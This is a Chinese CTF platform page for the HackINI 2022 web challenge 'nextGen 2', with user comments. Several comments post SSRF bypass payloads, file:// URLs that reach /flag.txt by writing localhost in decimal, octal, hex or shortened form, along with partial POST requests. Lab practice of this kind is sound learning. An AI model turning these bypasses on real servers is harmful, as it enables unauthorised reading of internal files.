nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1239
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
GNMO 2月前

file叫本地文件传输协议file://127.0.0.1/C:/ 本地C盘 file://localhost/D:/ 本地D盘 file:///E:/ 本地E盘

回复 0

Aerelin 4月前

为什么改完包发送依旧拿不到flag

回复 0

bugfuck2 7月前

service=file://127.0.0.01/flag.txt

回复 1

bugku111222 9月前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0

零基础110 9月前

shellmates{**********}

回复 0

2ew123123124 9月前

shellmates{******}

回复 0

lunarbyside 10月前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 3

脆脆sha_ 1年前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 8月前

niude

回复 0

意大利炮 1年前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 4

MOCHAOLIN 1年前

POST /request HTTP/1.1 Host: 82.157.146.43:10782 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

WriteUp

image
hopeinhand

1 金币

评分(1)

解题动态

hyj11125 攻破了该题 7小时前
HexHackerCat 攻破了该题 12小时前
shengood 攻破了该题 20小时前
VIP784 攻破了该题 1天前
tschick 攻破了该题 1天前
路痴通 攻破了该题 2天前
3268798994 攻破了该题 3天前
maxiaoyu 攻破了该题 3天前
mulai 攻破了该题 4天前
15509959509 攻破了该题 4天前
zhatao 攻破了该题 5天前
voic3 攻破了该题 5天前
xzy1 攻破了该题 5天前
lalala2022 攻破了该题 5天前
甘糖 攻破了该题 6天前
Syneran 攻破了该题 6天前
relish 攻破了该题 7天前
h1279300267 攻破了该题 9天前
谢鹤羽 攻破了该题 10天前
理塘王丁真 攻破了该题 10天前
问题反馈